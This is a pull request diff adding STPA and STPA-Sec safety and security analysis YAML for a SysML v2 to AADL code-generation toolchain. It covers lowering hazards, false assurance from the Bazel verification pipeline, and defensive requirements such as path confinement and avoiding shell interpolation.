### PR TITLE
safety: STPA + STPA-Sec analysis for v0.4.0

### DIFF
--- a/safety/stpa/analysis.yaml
+++ b/safety/stpa/analysis.yaml
@@ -109,6 +109,30 @@ artifacts:
     severity: critical
     losses: [L-1]
 
+  - id: H-7
+    type: hazard
+    title: SysML v2 lowering produces semantically incorrect AADL
+    description: >
+      The SysML v2 to AADL lowering transformation produces AADL
+      constructs that are syntactically valid but semantically wrong
+      (e.g., wrong component category, lost property constraints,
+      missing connections). The resulting AADL model passes all 21
+      analysis passes but does not faithfully represent the original
+      SysML v2 design intent.
+    severity: critical
+    losses: [L-1, L-4]
+
+  - id: H-8
+    type: hazard
+    title: Verification pipeline provides false assurance
+    description: >
+      The Bazel-based verification pipeline (Verus, Lean4, WASM component
+      rules) reports success when verification was not actually performed
+      (e.g., tool not installed, fallback to no-op, cached stale result).
+      Engineers believe generated code is formally verified when it is not.
+    severity: critical
+    losses: [L-1, L-3]
+
   # ══════════════════════════════════════════════════════════════════════
   # STEP 1c: System-Level Constraints
   # ══════════════════════════════════════════════════════════════════════
@@ -166,6 +190,27 @@ artifacts:
       defaults, and inheritance chains. Unit conversion factors must match
       the AS5506 standard.
     hazards: [H-6]
+
+  - id: SC-7
+    type: system-constraint
+    title: SysML v2 lowering semantic fidelity
+    description: >
+      The SysML v2 to AADL lowering must faithfully preserve the design
+      intent of the original SysML v2 model. Component categories, port
+      directions, connection topology, property values, and constraint
+      semantics must be correctly mapped. Unhandled SysML v2 constructs
+      must produce diagnostics, not be silently dropped.
+    hazards: [H-7]
+
+  - id: SC-8
+    type: system-constraint
+    title: Verification pipeline integrity
+    description: >
+      The Bazel verification pipeline must fail loudly when verification
+      tools (Verus, Lean4, wasm-tools) are unavailable or produce errors.
+      A green build must mean verification was actually performed, not
+      that verification was skipped.
+    hazards: [H-8]
 
   # ══════════════════════════════════════════════════════════════════════
   # STEP 2: Control Structure
@@ -244,6 +289,29 @@ artifacts:
       - Serialization preserves all fields
       - Format conversion (JSON, SVG, text) is lossless for the domain
 
+  - id: CTRL-SYSML2
+    type: controller
+    title: SysML v2 Lowering Controller (spar-sysml2)
+    controller-type: automated
+    source-file: crates/spar-sysml2/src/lower.rs
+    process-model:
+      - SysML v2 CST is complete (all valid constructs parsed)
+      - SEI mapping rules cover all SysML v2 construct types
+      - Category inference heuristics produce correct AADL categories
+      - Property semantics are preserved across the SysML/AADL boundary
+      - Unhandled SysML v2 constructs are rare and non-safety-relevant
+
+  - id: CTRL-CODEGEN
+    type: controller
+    title: Code Generator (spar-codegen)
+    controller-type: automated
+    source-file: crates/spar-codegen/src/workspace_gen.rs
+    process-model:
+      - AADL instance model is correct and complete
+      - Generated Bazel rules reference valid tool paths
+      - Verification rules (Verus, Lean4) produce definitive pass/fail
+      - WASM component packaging preserves interface contracts
+
   # ── Controlled Processes ───────────────────────────────────────────────
 
   - id: CP-SOURCE
@@ -308,6 +376,22 @@ artifacts:
     title: Review and approve architecture
     action: Evaluate analysis output and decide on architecture approval
     source: CTRL-REVIEWER
+    target: CP-DECISIONS
+
+  - id: CA-SYSML2-LOWER
+    type: control-action
+    title: Lower SysML v2 to AADL
+    action: Transform SysML v2 CST into AADL ItemTree using SEI mapping rules
+    source: CTRL-SYSML2
+    target: CP-MODEL
+
+  - id: CA-CODEGEN
+    type: control-action
+    title: Generate code and verification pipeline
+    action: >
+      Generate Rust crate skeletons, WIT interfaces, and Bazel BUILD files
+      with verification rules from the AADL instance model
+    source: CTRL-CODEGEN
     target: CP-DECISIONS
 
   # ══════════════════════════════════════════════════════════════════════
@@ -538,6 +622,107 @@ artifacts:
     controller: CTRL-OUTPUT
     hazards: [H-1]
 
+  # ── SysML v2 Lowering UCAs ────────────────────────────────────────────
+
+  - id: UCA-17
+    type: uca
+    title: SysML v2 lowering silently drops construct
+    uca-type: not-providing
+    context: >
+      When the SysML v2 source contains a valid construct (e.g., flow
+      definition, view def, analysis case, occurrence def) that the
+      lower_node wildcard arm silently ignores via `_ => {}`.
+    rationale: >
+      The construct is invisible to all downstream AADL processing. No
+      diagnostic is emitted, so the engineer believes the lowered model
+      is complete. If the dropped construct carried safety-critical
+      semantics (e.g., a timing constraint or allocation), the resulting
+      AADL model is incomplete.
+    controller: CTRL-SYSML2
+    hazards: [H-7]
+
+  - id: UCA-18
+    type: uca
+    title: SysML v2 lowering assigns wrong component category
+    uca-type: providing
+    context: >
+      When the infer_category heuristic misclassifies a part def
+      (e.g., a software process as a system, or a thread group as a
+      process) because the heuristic only checks for action/state
+      usages in the body.
+    rationale: >
+      Wrong category causes wrong analysis pass selection. A thread
+      classified as a system is never scheduled. A process classified
+      as a system does not get connectivity checks on internal ports.
+      Scheduling analysis produces no results (false negative).
+    controller: CTRL-SYSML2
+    hazards: [H-7, H-1]
+
+  - id: UCA-19
+    type: uca
+    title: SysML v2 property semantics lost in lowering
+    uca-type: providing
+    context: >
+      When a SysML v2 constraint usage or attribute usage carries timing
+      or resource semantics but is lowered to an Opaque PropertyExpr
+      that downstream AADL analyses cannot interpret.
+    rationale: >
+      The property exists in the AADL model but has no typed value.
+      Scheduling analysis skips it (no typed Period). The engineer
+      believes timing constraints from SysML v2 are being checked
+      when they are not.
+    controller: CTRL-SYSML2
+    hazards: [H-7, H-6]
+
+  - id: UCA-20
+    type: uca
+    title: Subcomponent category hardcoded to System
+    uca-type: providing
+    context: >
+      When lower_part_usage_to_subcomponent and lower_ref_usage_to_subcomponent
+      always set category to ComponentCategory::System regardless of the
+      referenced type's actual category in the SysML v2 model.
+    rationale: >
+      A process subcomponent classified as system will not have its
+      threads scheduled. A bus subcomponent classified as system will
+      not participate in binding analysis. The wrong category propagates
+      through instantiation to all downstream analyses.
+    controller: CTRL-SYSML2
+    hazards: [H-7, H-3]
+
+  # ── Codegen / Verification Pipeline UCAs ────────────────────────────
+
+  - id: UCA-21
+    type: uca
+    title: Verification rule silently passes when tool missing
+    uca-type: not-providing
+    context: >
+      When the Bazel verus_verify or lean_verify rule falls back to a
+      PATH lookup for the tool binary, and the binary is not installed,
+      the shell command may produce a non-zero exit but Bazel caching
+      or error handling could mask the failure in certain configurations.
+    rationale: >
+      Engineers see a cached green build and believe verification was
+      performed. The generated code ships without formal verification.
+      This is a false assurance hazard.
+    controller: CTRL-CODEGEN
+    hazards: [H-8]
+
+  - id: UCA-22
+    type: uca
+    title: Generated BUILD.bazel omits verification targets
+    uca-type: not-providing
+    context: >
+      When workspace_gen.rs generates per-crate BUILD.bazel files that
+      include rust_library and wasm_component targets but do not include
+      verus_verify or lean_verify targets for the generated code.
+    rationale: >
+      The generated project builds and tests pass, but no formal
+      verification is ever invoked. The verification pipeline exists
+      in the workspace root but is not wired to the generated crates.
+    controller: CTRL-CODEGEN
+    hazards: [H-8]
+
   # ══════════════════════════════════════════════════════════════════════
   # STEP 3b: Controller Constraints
   # ══════════════════════════════════════════════════════════════════════
@@ -694,6 +879,68 @@ artifacts:
     ucas: [UCA-16]
     hazards: [H-1]
 
+  - id: CC-15
+    type: controller-constraint
+    title: SysML v2 lowering must emit diagnostic for unhandled constructs
+    constraint: >
+      The lower_node function must not have a silent wildcard arm. Every
+      SysML v2 SyntaxKind not explicitly handled must produce a warning
+      diagnostic "unhandled SysML v2 construct: {kind}". This mirrors
+      the AADL lowering constraint (CC-2).
+    controller: CTRL-SYSML2
+    ucas: [UCA-17]
+    hazards: [H-7]
+
+  - id: CC-16
+    type: controller-constraint
+    title: Category inference must be validated against type definition
+    constraint: >
+      After lowering, the inferred category of a part def should be
+      validated against the features present. If the part has thread-like
+      properties (Period, Dispatch_Protocol) it must not be classified
+      as system. A mapping coverage test must verify all category
+      inference paths.
+    controller: CTRL-SYSML2
+    ucas: [UCA-18, UCA-20]
+    hazards: [H-7]
+
+  - id: CC-17
+    type: controller-constraint
+    title: SysML v2 constraint values must produce typed PropertyExpr
+    constraint: >
+      When lowering SysML v2 attribute or constraint usages that carry
+      numeric values with units (e.g., period = 10 ms), the lowering
+      must produce a typed PropertyExpr (IntegerLit with unit), not an
+      Opaque expression. Opaque is acceptable only for genuinely unparseable
+      expressions.
+    controller: CTRL-SYSML2
+    ucas: [UCA-19]
+    hazards: [H-7, H-6]
+
+  - id: CC-18
+    type: controller-constraint
+    title: Verification rules must fail on missing tools
+    constraint: >
+      Bazel verification rules (verus_verify, lean_verify) must explicitly
+      check for tool availability and produce a clear error message if the
+      tool binary is not found. The rule must not produce a cached success
+      artifact when verification was not performed.
+    controller: CTRL-CODEGEN
+    ucas: [UCA-21]
+    hazards: [H-8]
+
+  - id: CC-19
+    type: controller-constraint
+    title: Generated crates must include verification targets
+    constraint: >
+      The code generator must produce verus_verify and/or lean_verify
+      targets in per-crate BUILD.bazel files when verification source
+      files are present. An integration test must verify that generated
+      BUILD.bazel files contain verification targets.
+    controller: CTRL-CODEGEN
+    ucas: [UCA-22]
+    hazards: [H-8]
+
   # ══════════════════════════════════════════════════════════════════════
   # STEP 4: Loss Scenarios
   # ══════════════════════════════════════════════════════════════════════
@@ -836,3 +1083,103 @@ artifacts:
       - Alert fatigue causes engineer to ignore diagnostics
     uca: [UCA-13]
     hazards: [H-2, H-1]
+
+  - id: LS-9
+    type: loss-scenario
+    title: SysML v2 flow definition silently dropped during lowering
+    scenario-type: inadequate-control-algorithm
+    description: >
+      A SysML v2 model contains a `flow def` that specifies an end-to-end
+      data path between ports. The lower_node function matches against
+      known SyntaxKinds but `FLOW_DEF` is not handled -- it falls through
+      to `_ => {}`. No AADL flow spec or end-to-end flow is created. The
+      lowered AADL model has all the ports and connections but no flow
+      declarations. Latency analysis reports "no flows defined" (info)
+      instead of computing latency bounds. The engineer believes the
+      SysML v2 flows were carried over.
+    causal-factors:
+      - lower_node wildcard silently drops unrecognized SyntaxKinds
+      - No diagnostic emitted for unhandled constructs
+      - Latency analysis treats missing flows as "not applicable"
+    uca: [UCA-17]
+    hazards: [H-7, H-1]
+
+  - id: LS-10
+    type: loss-scenario
+    title: Part def misclassified as system instead of process
+    scenario-type: inadequate-process-model
+    description: >
+      A SysML v2 part def represents a software process containing threads.
+      The infer_category heuristic checks for action/state usages in the
+      body but the threads are expressed as nested part usages (not actions).
+      The part is classified as ComponentCategory::System. The AADL model
+      has a system implementation with system subcomponents where it should
+      have a process implementation with thread subcomponents. Scheduling
+      analysis finds no threads on any processor and reports no issues.
+      The actual thread set is never checked for schedulability.
+    causal-factors:
+      - Category heuristic only checks for action/state, not thread indicators
+      - Subcomponent lowering hardcodes System category
+      - No post-lowering validation of category consistency
+    uca: [UCA-18, UCA-20]
+    hazards: [H-7, H-1]
+
+  - id: LS-11
+    type: loss-scenario
+    title: SysML v2 timing constraint lowered as Opaque property
+    scenario-type: inadequate-control-algorithm
+    description: >
+      A SysML v2 constraint usage `constraint timing : TimingConstraint`
+      with `attribute period = 10 ms` is lowered via
+      lower_constraint_usage_to_property which produces a PropertyExpr::Opaque
+      string "TimingConstraint" instead of a typed IntegerLit with unit.
+      The AADL model has a Timing_Properties::timing property with an
+      opaque value. Scheduling analysis calls get_timing_property() which
+      cannot parse the opaque string and returns None. The thread's period
+      is treated as unspecified. No scheduling check is performed.
+    causal-factors:
+      - lower_constraint_usage_to_property uses type ref as value, not the actual constraint value
+      - PropertyExpr::Opaque skips property validation (by design for AADL)
+      - Scheduling analysis silently skips components without Period
+    uca: [UCA-19]
+    hazards: [H-7, H-6]
+
+  - id: LS-12
+    type: loss-scenario
+    title: Verus not installed but BUILD succeeds from cache
+    scenario-type: inadequate-feedback
+    description: >
+      A developer generates code with `spar codegen`. The generated
+      BUILD.bazel loads verus_verify rules. On first build, Verus is not
+      installed and the rule fails. The developer installs Verus and runs
+      the build -- it succeeds and the proof log is cached. Later, the
+      developer modifies generated source but Bazel's dependency tracking
+      does not detect the change (e.g., the file is outside the sandbox).
+      The stale cached proof log is reused. The modified code is not
+      re-verified but the build reports success.
+    causal-factors:
+      - Bazel caching can serve stale verification results if inputs are not hermetic
+      - verus_verify rule uses run_shell which may not capture all inputs
+      - No verification artifact freshness check
+    uca: [UCA-21]
+    hazards: [H-8]
+
+  - id: LS-13
+    type: loss-scenario
+    title: Generated crate has no verification targets
+    scenario-type: inadequate-control-algorithm
+    description: >
+      The workspace_gen.rs generates per-crate BUILD.bazel files with
+      rust_library, wasm_component, and rust_test targets. However, it does
+      not generate verus_verify or lean_verify targets because the code
+      generator does not know which files contain proof annotations. The
+      workspace root BUILD.bazel loads the verification rules but no
+      per-crate target uses them. Running `bazel test //...` executes
+      all rust_test targets but no formal verification. Engineers believe
+      the full pipeline ran because the workspace imports verification rules.
+    causal-factors:
+      - workspace_gen.rs only generates build/test targets, not verification targets
+      - Root BUILD.bazel imports verification rules but they are unused
+      - No integration test checks that verification targets exist per crate
+    uca: [UCA-22]
+    hazards: [H-8]

--- a/safety/stpa/architecture.yaml
+++ b/safety/stpa/architecture.yaml
@@ -550,3 +550,176 @@ artifacts:
     links:
       - type: satisfies
         target: STPA-REQ-023
+
+  # ══════════════════════════════════════════════════════════════════════
+  # SysML v2 Lowering Safety (STPA-REQ-032 through STPA-REQ-036)
+  # ══════════════════════════════════════════════════════════════════════
+
+  - id: ARCH-026
+    type: design-decision
+    title: SysML v2 lowering diagnostic infrastructure (planned)
+    description: >
+      The SysML v2 lower.rs currently has a silent wildcard `_ => {}` in
+      lower_node that drops unrecognized SyntaxKind variants without
+      diagnostic. The planned fix mirrors ARCH-003 (AADL lowering): replace
+      the wildcard with explicit no-op arms for known non-semantic kinds
+      (WHITESPACE, COMMENT, ERROR, SEMICOLON) and a catch-all that emits
+      a warning diagnostic via the LoweringDiagnostic infrastructure.
+    fields:
+      rationale: >
+        The SysML v2 lowering has the same silent-drop risk as the original
+        AADL lowering did before ARCH-003. As SysML v2 evolves and new
+        construct types are added, silent dropping becomes increasingly
+        dangerous. The diagnostic infrastructure already exists in ItemTree.
+      source-files:
+        - crates/spar-sysml2/src/lower.rs  # lower_node wildcard arm
+      status: planned
+    links:
+      - type: satisfies
+        target: STPA-REQ-032
+
+  - id: ARCH-027
+    type: design-decision
+    title: Category inference validation for SysML v2 lowering (planned)
+    description: >
+      The infer_category heuristic in lower.rs checks for action/state
+      usages to distinguish system vs. process categories. This is
+      insufficient -- a part def with nested part usages typed as threads
+      should be classified as process. The planned fix adds a post-lowering
+      validation pass that cross-checks the inferred category against
+      subcomponent categories and property associations. Additionally,
+      lower_part_usage_to_subcomponent and lower_ref_usage_to_subcomponent
+      should propagate the referenced type's category instead of hardcoding
+      ComponentCategory::System.
+    fields:
+      rationale: >
+        Hardcoding System category for all subcomponents defeats the
+        purpose of category-specific analyses (scheduling requires threads,
+        binding requires processes). The referenced type's category is
+        available after lowering and should be propagated.
+      source-files:
+        - crates/spar-sysml2/src/lower.rs  # infer_category, lower_part_usage_to_subcomponent
+      status: planned
+    links:
+      - type: satisfies
+        target: STPA-REQ-033
+      - type: satisfies
+        target: STPA-REQ-034
+
+  - id: ARCH-028
+    type: design-decision
+    title: Typed property lowering for SysML v2 constraints (planned)
+    description: >
+      lower_constraint_usage_to_property and lower_attribute_usage_to_property
+      currently produce PropertyExpr::Opaque for all values. The planned
+      fix adds value expression parsing: when the attribute/constraint body
+      contains a numeric literal with a unit (e.g., `10 ms`), produce a
+      typed PropertyExpr::IntegerLit or PropertyExpr::RealLit with unit
+      annotation. Opaque remains the fallback for genuinely unparseable
+      expressions.
+    fields:
+      rationale: >
+        Opaque property values are invisible to typed property accessors
+        (STPA-REQ-015). Scheduling analysis, latency analysis, and resource
+        budget all depend on typed property access. Without typed values,
+        SysML v2-sourced models receive no timing/resource analysis.
+      source-files:
+        - crates/spar-sysml2/src/lower.rs  # lower_constraint_usage_to_property
+      status: planned
+    links:
+      - type: satisfies
+        target: STPA-REQ-035
+
+  - id: ARCH-029
+    type: design-decision
+    title: SysML v2 lowering golden model tests
+    description: >
+      Added codegen golden model test and SysML v2 validation suite
+      covering the 14 lowering rules. The test suite includes per-rule
+      unit tests and a golden model comparison test that verifies
+      end-to-end lowering of a non-trivial SysML v2 model against
+      expected AADL output.
+    fields:
+      rationale: >
+        Golden model tests catch regressions in lowering semantics that
+        individual unit tests might miss. The test verifies the overall
+        lowering output structure, not just individual constructs.
+      source-files:
+        - crates/spar-sysml2/tests/  # Golden model and validation tests
+    links:
+      - type: satisfies
+        target: STPA-REQ-036
+
+  # ══════════════════════════════════════════════════════════════════════
+  # Verification Pipeline Safety (STPA-REQ-037 through STPA-REQ-039)
+  # ══════════════════════════════════════════════════════════════════════
+
+  - id: ARCH-030
+    type: design-decision
+    title: Verification tool availability guard in Bazel rules (planned)
+    description: >
+      The verus_verify and lean_verify rules currently fall back to PATH
+      lookup when the toolchain is not explicitly configured. The planned
+      fix adds an explicit tool availability check at the start of each
+      rule's run_shell command: `which verus || (echo "ERROR: verus not
+      found" >&2; exit 1)`. Additionally, the rule should verify tool
+      version by parsing `verus --version` output.
+    fields:
+      rationale: >
+        Silent fallback to missing tools is the primary mechanism for
+        false assurance (LS-12). An explicit check prevents the shell
+        command from producing ambiguous error messages that Bazel might
+        not propagate clearly.
+      source-files:
+        - tools/bazel/rules_verus/defs.bzl   # _verus_verify_impl
+        - tools/bazel/rules_lean/defs.bzl    # _lean_verify_impl
+      status: planned
+    links:
+      - type: satisfies
+        target: STPA-REQ-037
+
+  - id: ARCH-031
+    type: design-decision
+    title: Per-crate verification targets in codegen (planned)
+    description: >
+      workspace_gen.rs currently generates rust_library, wasm_component,
+      and rust_test targets per crate. The planned fix adds verus_verify
+      and lean_verify targets when the generated crate contains files
+      matching proof patterns (verus! blocks, #[kani::proof], .lean files).
+      A flag `--verification-targets` on `spar codegen` controls this.
+    fields:
+      rationale: >
+        Without per-crate verification targets, the verification rules
+        loaded in the root BUILD.bazel are never invoked (LS-13). The
+        code generator is the natural place to wire verification because
+        it knows which files contain proof annotations.
+      source-files:
+        - crates/spar-codegen/src/workspace_gen.rs  # generate_crate_build_bazel
+      status: planned
+    links:
+      - type: satisfies
+        target: STPA-REQ-038
+
+  - id: ARCH-032
+    type: design-decision
+    title: Proof log content validation in Bazel rules (planned)
+    description: >
+      The verus_verify and lean_verify rules produce proof log files but
+      do not validate their content. The planned fix adds a post-verification
+      check in the run_shell command that greps the log for expected
+      success markers ("verification results" for Verus, "All proofs
+      verified." for Lean4). Empty or error-only logs cause the rule
+      to fail with a diagnostic message.
+    fields:
+      rationale: >
+        A proof log that contains only error output or is empty indicates
+        that verification did not complete successfully. Without content
+        validation, a partial failure could produce a non-empty log file
+        that Bazel accepts as a successful output.
+      source-files:
+        - tools/bazel/rules_verus/defs.bzl   # _verus_verify_impl
+        - tools/bazel/rules_lean/defs.bzl    # _lean_verify_impl
+      status: planned
+    links:
+      - type: satisfies
+        target: STPA-REQ-039

--- a/safety/stpa/requirements.yaml
+++ b/safety/stpa/requirements.yaml
@@ -444,3 +444,319 @@ artifacts:
     tags: [safety, scheduling, contention, stpa]
     traces-to: [CC-10]
     mitigates: [H-1]
+
+  # ══════════════════════════════════════════════════════════════════════
+  # SysML v2 Lowering Safety Requirements (from UCA-17 to UCA-20, CC-15 to CC-17)
+  # ══════════════════════════════════════════════════════════════════════
+
+  - id: STPA-REQ-032
+    type: requirement
+    title: SysML v2 lowering diagnostic for unhandled constructs
+    description: >
+      The SysML v2 lower_node function must not silently drop unrecognized
+      SyntaxKind variants. The wildcard arm `_ => {}` must be replaced
+      with explicit arms for known non-semantic kinds and a catch-all that
+      emits a warning diagnostic "unhandled SysML v2 construct: {kind}".
+      This mirrors the AADL lowering exhaustiveness (STPA-REQ-004).
+    status: not-implemented
+    tags: [safety, sysml2, lowering, stpa]
+    traces-to: [CC-15]
+    mitigates: [H-7]
+
+  - id: STPA-REQ-033
+    type: requirement
+    title: SysML v2 category inference validation
+    description: >
+      After SysML v2 lowering, the inferred AADL component category must
+      be validated against the features present in the lowered component.
+      If a component has thread-like properties (Period, Dispatch_Protocol)
+      it must not be classified as system. A test suite must cover all
+      category inference paths with at least one test per SysML v2
+      construct type (part def, action def, state def, etc.).
+    status: not-implemented
+    tags: [safety, sysml2, category, stpa]
+    traces-to: [CC-16]
+    mitigates: [H-7, H-1]
+
+  - id: STPA-REQ-034
+    type: requirement
+    title: SysML v2 subcomponent category propagation
+    description: >
+      When lowering SysML v2 part usages and ref usages to AADL
+      subcomponents, the subcomponent category must be inferred from
+      the referenced type definition's category, not hardcoded to
+      ComponentCategory::System. When the referenced type is not
+      available, a warning diagnostic must be emitted.
+    status: not-implemented
+    tags: [safety, sysml2, category, stpa]
+    traces-to: [CC-16]
+    mitigates: [H-7, H-3]
+
+  - id: STPA-REQ-035
+    type: requirement
+    title: SysML v2 typed property lowering for numeric constraints
+    description: >
+      When lowering SysML v2 constraint usages and attribute usages that
+      carry numeric values with units (e.g., "10 ms"), the lowering must
+      produce typed PropertyExpr values (IntegerLit/RealLit with unit
+      annotation), not Opaque strings. Only expressions that genuinely
+      cannot be parsed should use PropertyExpr::Opaque.
+    status: not-implemented
+    tags: [safety, sysml2, properties, stpa]
+    traces-to: [CC-17]
+    mitigates: [H-7, H-6]
+
+  - id: STPA-REQ-036
+    type: requirement
+    title: SysML v2 lowering coverage test suite
+    description: >
+      The SysML v2 lowering test suite must contain at least one test
+      for each of the 14+ lowering rules, verifying that the produced
+      AADL ItemTree has the correct category, features, subcomponents,
+      connections, and property associations. A golden model test must
+      verify end-to-end lowering of a non-trivial SysML v2 model.
+    status: partial
+    tags: [safety, sysml2, testing, stpa]
+    traces-to: [CC-15, CC-16]
+    mitigates: [H-7]
+
+  # ══════════════════════════════════════════════════════════════════════
+  # Verification Pipeline Safety Requirements (from UCA-21, UCA-22, CC-18, CC-19)
+  # ══════════════════════════════════════════════════════════════════════
+
+  - id: STPA-REQ-037
+    type: requirement
+    title: Verification tool availability check
+    description: >
+      Bazel verification rules (verus_verify, lean_verify) must perform
+      an explicit tool availability check before running verification.
+      If the tool binary is not found on PATH or at the configured path,
+      the rule must fail with a clear error message, not produce a
+      cached success artifact. The check must use `which` or equivalent
+      and verify the tool version meets minimum requirements.
+    status: not-implemented
+    tags: [safety, codegen, verification, bazel, stpa]
+    traces-to: [CC-18]
+    mitigates: [H-8]
+
+  - id: STPA-REQ-038
+    type: requirement
+    title: Generated BUILD files must include verification targets
+    description: >
+      The workspace_gen.rs code generator must produce verus_verify
+      and/or lean_verify targets in per-crate BUILD.bazel files when
+      generating code that includes verification annotations. An
+      integration test must verify that generated BUILD.bazel files
+      contain at least one verification target per generated crate.
+    status: not-implemented
+    tags: [safety, codegen, verification, bazel, stpa]
+    traces-to: [CC-19]
+    mitigates: [H-8]
+
+  - id: STPA-REQ-039
+    type: requirement
+    title: Verification log content validation
+    description: >
+      Bazel verification rules must validate that the proof log artifact
+      contains actual verification output (not empty or error-only).
+      The verus_verify rule must check that the log contains a
+      "verification results" summary line. The lean_verify rule must
+      check that the log contains "All proofs verified." A log that
+      contains only error messages must cause the rule to fail.
+    status: not-implemented
+    tags: [safety, codegen, verification, bazel, stpa]
+    traces-to: [CC-18]
+    mitigates: [H-8]
+
+  # ══════════════════════════════════════════════════════════════════════
+  # STPA-Sec: Security Requirements (from security.yaml analysis)
+  # ══════════════════════════════════════════════════════════════════════
+
+  - id: STPA-SEC-REQ-001
+    type: requirement
+    title: Language-specific identifier sanitization for generated code
+    description: >
+      The code generation pipeline must sanitize all model-derived names
+      using language-specific rules before interpolation. Rust: reject
+      names that are Rust keywords (even after r# prefix handling) and
+      validate against Rust identifier grammar. WIT: reject names that
+      collide with WIT built-in types (string, list, option, result,
+      bool, u8-u64, s8-s64, f32, f64, char). Lean4: reject names that
+      collide with Lean4 tactics (simp, omega, exact, apply, intro).
+      TOML: escape quotes and special characters in string values.
+      Starlark: reject Python/Starlark keywords.
+    status: not-implemented
+    tags: [security, codegen, stpa-sec]
+    traces-to: [CC-SEC-1]
+    mitigates: [H-SEC-1]
+
+  - id: STPA-SEC-REQ-002
+    type: requirement
+    title: Property value validation before code generation
+    description: >
+      Before generating code, timing properties must be validated against
+      physical plausibility bounds: Period must be in range [1 us, 1 hr],
+      WCET must be in range [1 ns, Period], Deadline must be in range
+      [WCET, Period]. Properties outside these bounds must produce error
+      diagnostics and halt code generation. Default value substitution
+      (the current 10ms/1ms fallback) must emit a warning diagnostic
+      rather than proceeding silently.
+    status: not-implemented
+    tags: [security, codegen, stpa-sec]
+    traces-to: [CC-SEC-2]
+    mitigates: [H-SEC-2]
+
+  - id: STPA-SEC-REQ-003
+    type: requirement
+    title: Output path confinement for generated files
+    description: >
+      The codegen pipeline must canonicalize all generated file paths
+      and verify that each resolved path is a descendant of the output
+      directory. If any generated path would escape the output directory
+      (via .., symlinks, or absolute paths), codegen must emit an error
+      and skip that file. This check must occur after all path component
+      construction, including process name and thread name interpolation.
+    status: not-implemented
+    tags: [security, codegen, filesystem, stpa-sec]
+    traces-to: [CC-SEC-3]
+    mitigates: [H-SEC-6]
+
+  - id: STPA-SEC-REQ-004
+    type: requirement
+    title: SysML v2 lowering diagnostic for unhandled syntax kinds
+    description: >
+      The wildcard match arm in lower_node (lower.rs) must emit a warning
+      diagnostic for any SyntaxKind that is not whitespace, punctuation,
+      or a known structural wrapper. The diagnostic must include the
+      SyntaxKind name, source offset, and parent context. A golden-file
+      test must verify that all semantic SysML v2 constructs produce
+      either a lowered AADL item or a diagnostic.
+    status: not-implemented
+    tags: [security, sysml2, lowering, stpa-sec]
+    traces-to: [CC-SEC-4]
+    mitigates: [H-SEC-3]
+
+  - id: STPA-SEC-REQ-005
+    type: requirement
+    title: Exact version pins in generated dependency specifications
+    description: >
+      Generated Cargo.toml files must use exact version pins (e.g.,
+      wit-bindgen = "=0.36.0") instead of semver ranges. Generated
+      BUILD.bazel files must reference content-addressed artifacts
+      where possible. A Cargo.lock must be generated alongside the
+      workspace Cargo.toml. Process names must be checked against a
+      reserved list of common crate names (serde, tokio, rand, etc.)
+      and must be prefixed with "aadl_" if they collide.
+    status: not-implemented
+    tags: [security, codegen, supply-chain, stpa-sec]
+    traces-to: [CC-SEC-5]
+    mitigates: [H-SEC-4]
+
+  - id: STPA-SEC-REQ-006
+    type: requirement
+    title: Verification coverage scope annotations
+    description: >
+      Generated Kani harnesses must include a doc comment specifying
+      which properties are verified (e.g., "base case: no interference")
+      and which are not (e.g., "does NOT verify multi-task interference").
+      Generated Lean4 proofs must include a comment block listing
+      assumptions. Harness function names must include scope qualifiers
+      (e.g., verify_{name}_no_deadline_miss_base_case). The codegen
+      must also generate a coverage_manifest.json listing each
+      verification artifact and its scope.
+    status: not-implemented
+    tags: [security, verification, stpa-sec]
+    traces-to: [CC-SEC-6]
+    mitigates: [H-SEC-5]
+
+  - id: STPA-SEC-REQ-007
+    type: requirement
+    title: Bazel rules must use argument lists instead of shell interpolation
+    description: >
+      The verus_verify and wasm_component Bazel rules must be refactored
+      to use ctx.actions.run with explicit argument lists instead of
+      ctx.actions.run_shell with format string interpolation. Source file
+      paths must never be concatenated into shell command strings. If
+      run_shell is unavoidable (e.g., for piping), all interpolated paths
+      must be shell-quoted using shlex or equivalent escaping.
+    status: not-implemented
+    tags: [security, build, bazel, stpa-sec]
+    traces-to: [CC-SEC-7]
+    mitigates: [H-SEC-1, H-SEC-4]
+
+  - id: STPA-SEC-REQ-008
+    type: requirement
+    title: WASM component provenance verification
+    description: >
+      The wasm_component Bazel rule must parse cargo build's
+      --message-format=json output to extract the exact path of the
+      produced .wasm artifact, instead of using find to locate it.
+      The rule must verify that the .wasm file was produced by the
+      current build invocation (via Bazel's action dependency graph,
+      not filesystem timestamps). Content hashing of the core module
+      should be logged for audit.
+    status: not-implemented
+    tags: [security, build, wasm, stpa-sec]
+    traces-to: [CC-SEC-8]
+    mitigates: [H-SEC-1, H-SEC-2]
+
+  - id: STPA-SEC-REQ-009
+    type: requirement
+    title: Resource limits on code generation output
+    description: >
+      The codegen pipeline must enforce configurable limits: maximum
+      number of generated files (default: 10,000), maximum total output
+      size (default: 100 MB), maximum components per model (default:
+      100,000). When a limit is exceeded, codegen must emit an error
+      diagnostic and halt. These limits must be configurable via CLI
+      flags (--max-files, --max-output-size, --max-components).
+    status: not-implemented
+    tags: [security, codegen, resource-limits, stpa-sec]
+    traces-to: [SC-SEC-6]
+    mitigates: [H-SEC-7]
+
+  - id: STPA-SEC-REQ-010
+    type: requirement
+    title: Generated code compilation verification test
+    description: >
+      The CI pipeline must include an integration test that runs
+      spar codegen on a representative AADL model, then compiles
+      all generated Rust code with cargo check (and ideally cargo
+      clippy). This test verifies that generated code is syntactically
+      valid Rust. A second test must verify that generated WIT files
+      pass wasm-tools component wit validation.
+    status: not-implemented
+    tags: [security, codegen, testing, stpa-sec]
+    traces-to: [CC-SEC-1, CC-SEC-2]
+    mitigates: [H-SEC-1, H-SEC-2]
+
+  - id: STPA-SEC-REQ-011
+    type: requirement
+    title: SysML v2 category inference audit logging
+    description: >
+      The infer_category function must emit an info diagnostic for
+      every part def it classifies, stating the inferred category
+      and the evidence used (e.g., "part def 'Monitor' classified
+      as system: no action/state usages found"). Engineers must be
+      able to override the inference via a SysML v2 annotation or
+      comment convention (e.g., `/* @aadl-category: thread */`).
+    status: not-implemented
+    tags: [security, sysml2, lowering, stpa-sec]
+    traces-to: [CC-SEC-4]
+    mitigates: [H-SEC-3]
+
+  - id: STPA-SEC-REQ-012
+    type: requirement
+    title: Cross-reference analysis results with proof inputs
+    description: >
+      When both spar analyze and spar codegen --verify are run on the
+      same model, the timing properties used by the analysis engine
+      must be compared with the timing constants embedded in generated
+      proofs. Any discrepancy (e.g., analysis uses 5ms period but
+      proof uses default 10ms) must be reported as an error. This
+      cross-reference should be implemented as a post-codegen
+      validation step.
+    status: not-implemented
